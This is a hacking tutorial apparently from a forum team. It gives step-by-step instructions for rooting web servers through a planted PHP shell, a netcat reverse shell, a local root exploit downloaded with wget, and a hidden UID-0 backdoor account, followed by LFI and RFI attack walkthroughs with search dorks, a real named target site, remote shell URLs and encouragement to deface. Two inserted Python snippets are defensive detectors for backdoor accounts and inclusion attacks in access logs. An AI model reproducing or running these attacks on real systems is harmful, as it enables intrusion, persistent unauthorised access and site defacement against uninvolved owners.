★☆★rooting Tutorial ★☆★


Greetings ALBoRaaQ-TeAm



★☆★ Server r00ting ★☆★
So let's start with things you will need:

1) Shelled website 
2) Local root exploit 
3) NetCat 

Chapter 1 - Gathering information

Open up your .php shell on a hacked webserver.
I have mine for an example

Now you need to check what kernel your slave is using...
It should be something like 

Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14Server r00ting21 EST 2007 i686

The next thing you want to do is look for a local root exploit.
In the example provided, mine is 2.6.18-8.el5 #1 SMP Fri Jan 26 14Server r00ting21 EST 2007 i686.


Here's the list of exploits
http://pastebin.com/JRTMWBDh

NOTE: If your webserver has a 2.6.18 2011 kernel, then you have a 0.0001% chance of rooting it, because there's no public exploit for that version.


Chapter 2 - Backconnecting to the server
For this you will need:

1) NetCat
2) Open port (for example 443; I won't teach how to port forward, use Google if you don't know how!!)


So open your netcat and type:
-l -n -v -p 443
Hit "Enter"


Now it should write "listening on [any] 443 ..."
Good.
Go back to your shell and go to "BackConnect function"
Many shells have it.
Enter your port and press "Connect".



Now it should connect to your netcat 
I got something like this


Chapter 3 - Downloading exploit and executing it
Now we will need our exploit from Chapter 1
There are 2 ways of uploading:

1) Using shell uploader
2) Using 'wget' function (Requires backconnection)

I'm going to use 'wget' function because it's easier and faster.
So copy your exploit link (mine is http://localroot.th3-0utl4ws.com/xploits...8-164.zip) and go back to your netcat and type:
Now it downloaded our exploit named "2.6.18-164.zip" on our server.

If your exploit is downloaded as anyrandomname.c you must compile it.
To do that, first download that exploit and then type:

gcc anyrandomname.c -o anyrandomname
And our exploit is compiled. (If you get errors when compiling then find another exploit)


If you downloaded your exploit as a zip file anyrandomname.zip, type:

unzip anyrandomname.zip


Now you should have your exploit (Like mine "2.6.18-164")

If you completed all steps it's time to get root.

Type:

chmod 777 yourexploit'sname
With common sense, where I typed "yourexploit'sname" you will type your exploit's name.

And one last final step is to run our exploit
./yourexploit'sname


To check if you got root type

id
or 
whoami

My steps to root


Chapter 4 - Adding root user
Adding new root user is fairly easy
We use this command:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

Command explanations:
adduser - Using Linux adduser command to create a new user account or to update default new user information.

-u 0 -o - Set the value of user id to 0.

-g 0 - Set the initial group number or name to 0

-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M - 'home directory' not created for the user.

root2 - User name of the new user account.
NOTE: Change root2 to your desired username.

Now you need to set a password for your username.
Type the following:
passwd root2

(root2 is your username)

See an example

[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

To check if you did alright

id root2
(root2 is your username)
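
From the defender's side, the account this chapter creates stands out: the -o flag lets adduser reuse UID 0, so /etc/passwd ends up with a second UID 0 entry. The check below is an added example, not part of the original tutorial; the function names and the sample passwd and group lines are constructed for illustration.

```python
"""Find extra UID-0 accounts and the privileged groups they joined."""

# GID -> name for the groups listed in the tutorial's -G option.
WATCHED_GROUPS = {0: "root", 1: "bin", 2: "daemon", 3: "sys",
                  4: "adm", 6: "disk", 10: "wheel"}

def parse_passwd(text):
    """Yield (name, uid, gid) for each well-formed passwd(5) line."""
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or not (fields[2].isdecimal() and fields[3].isdecimal()):
            continue  # blank, comment or malformed line
        yield fields[0], int(fields[2]), int(fields[3])

def group_members(text):
    """Map gid -> set of supplementary members from group(5) text."""
    members = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 4 and fields[2].isdecimal():
            members[int(fields[2])] = {m for m in fields[3].split(",") if m}
    return members

def extra_root_accounts(passwd_text, group_text=""):
    """Return [(name, primary_gid, [watched groups joined])] for every
    account other than 'root' whose UID is 0."""
    members = group_members(group_text)
    findings = []
    for name, uid, gid in parse_passwd(passwd_text):
        if uid == 0 and name != "root":
            joined = sorted(n for g, n in WATCHED_GROUPS.items()
                            if name in members.get(g, ()))
            findings.append((name, gid, joined))
    return findings

# Constructed sample data: the real root entry, a service account, and an
# entry shaped like the account this chapter creates.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
root2:x:0:0::/home/root2:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:root,root2
bin:x:1:root,bin,daemon,root2
wheel:x:10:root,root2
apache:x:48:
"""
```

On a live host the same functions can be fed the contents of /etc/passwd and /etc/group; any non-empty result deserves investigation.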


Google - http://google.com
NetCat - http://downloadnetcat.com/nc11nt.zip





Local File Inclusion

LFI : Local File Inclusion 

LFI attacks occur in a web application when parameters are not properly checked before being used to include files. Through this vulnerability an attacker can view arbitrary files on the server and can even deface the site by uploading a shell.
So now we will learn how to hack a website with the LFI method.
Things you require :-
LFI vulnerable site
User-Agent Switcher = https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/
A remote shell
So let's begin.....
This is a vulnerable link :- www.lamesite.com/index.php?id=page.php so we will check our LFI exploit code on this site. Then our vulnerable link will be like this :-
www.lamesite.com/index.php?id=../../../../../../../../../../../../../../etc/passwd
Now we will open /proc/self/environ :-
www.lamesite.com/index.php?id=./../../../../../../../../../../../../../proc/self/environ
Now we will upload the shell to the vulnerable site.
First of all download the User-Agent Switcher, open it and click on New > New User-Agent.

After opening the New User Agent dialog, replace the User Agent with
” ” without quotes, give whatever description you like and click on OK. Then refresh the page and you will get the PHP info file open in the tab.

Now go to the user agents again, replace the User Agent with and click OK.
( http://www.sh3ll.org/egy.txt you can put your remote shell link and -O will convert the shell in shell.php )
Now we have successfully uploaded the shell to the site. You will get the shell link like this www.lamesite.com/shell.php .
That’s it. I hope you all will like the tutorial and don’t forget to share it :)


Remote File Inclusion


RFI ( Remote File Inclusion ) is a method of injecting a remote file link into the server to get access to the site. Through this vulnerability an attacker can deface the site or compromise its data.
* Before getting started ( Things required )
A shell uploaded to any web hosting, try my3gb( dot )com ( any shell you like )
Vulnerable site
A sharp brain ;)
Mostly Used Dorks for RFI :-
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
How to hack a website using the RFI method
After uploading the shell to the hosting, get its link, e.g. :- username.my3gb.com/shell_name.php . Now for the vulnerable site.
You can get them by using dorks. I am using this site :- http://www.cbspk.com
Here’s the vulnerable link of the site :- http://www.cbspk.com/v2/index.php?page=site link here.
Now, to check whether the site is vulnerable or not, you have to put any site link after ?page= for example :-
http://www.cbspk.com/v2/index.php?page=http://google.com
If it opens google.com in the same page then it’s vulnerable, and if it doesn’t then check another site.

Now after getting the vulnerable site, replace http://google.com with your shell link. Now the exploit link will be :-
http://www.cbspk.com/v2/index.php?page=http://username.my3gb.com/shell.php?
Also add ? to the link; if the site is vulnerable it will embed the page in the site.
After successful execution, the only thing left is your creativity: defacing ;)
Hope you enjoyed the tutorial ” How to hack a website using RFI method “ and don’t forget to share it
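
Both the LFI and the RFI requests described above leave recognisable traces in the web server's access log. This added example (not from the original tutorial) classifies combined-format log lines for traversal sequences, the /etc/passwd and /proc/self/environ targets, a URL passed as a parameter value, and PHP tags in the User-Agent; the sample lines, host names and indicator names are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request target and User-Agent from an Apache/nginx "combined" log line.
LOG_RE = re.compile(
    r'"[A-Z]+ (?P<target>\S+)[^"]*" \d{3} \S+ "[^"]*" "(?P<agent>[^"]*)"')
TRAVERSAL = re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")
REMOTE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
SENSITIVE = ("/etc/passwd", "/proc/self/environ")  # files named in the text

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return the sorted indicator names found in one access-log line."""
    match = LOG_RE.search(line)
    if not match:
        return []
    hits = set()
    query = match.group("target").partition("?")[2]
    for _, raw in parse_qsl(query, keep_blank_values=True):
        value = decode(raw)
        if TRAVERSAL.search(value):
            hits.add("path-traversal")
        if any(path in value for path in SENSITIVE):
            hits.add("sensitive-file")
        if REMOTE.match(value):
            hits.add("remote-include")
    if "<?" in match.group("agent"):
        hits.add("code-in-user-agent")
    return sorted(hits)

def scan(lines):
    """Return [(line_number, indicators)] for every line with a finding."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := classify(line))]

# Constructed sample lines (documentation address and host name).
PREFIX = '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] '
SAMPLE_LOG = [PREFIX + tail for tail in (
    '"GET /index.php?id=page.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '"GET /index.php?id=../../../../etc/passwd HTTP/1.1" 200 1873 "-" "Mozilla/5.0"',
    '"GET /index.php?id=..%252f..%252fproc%252fself%252fenviron HTTP/1.1" 200 941 "-" "<?php /* placeholder */ ?>"',
    '"GET /v2/index.php?page=http://files.example/page.txt? HTTP/1.1" 200 7002 "-" "Mozilla/5.0"',
)]
```

A 200 status on a flagged line, as in the samples, is the case to triage first, since it suggests the include parameter was accepted rather than rejected.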
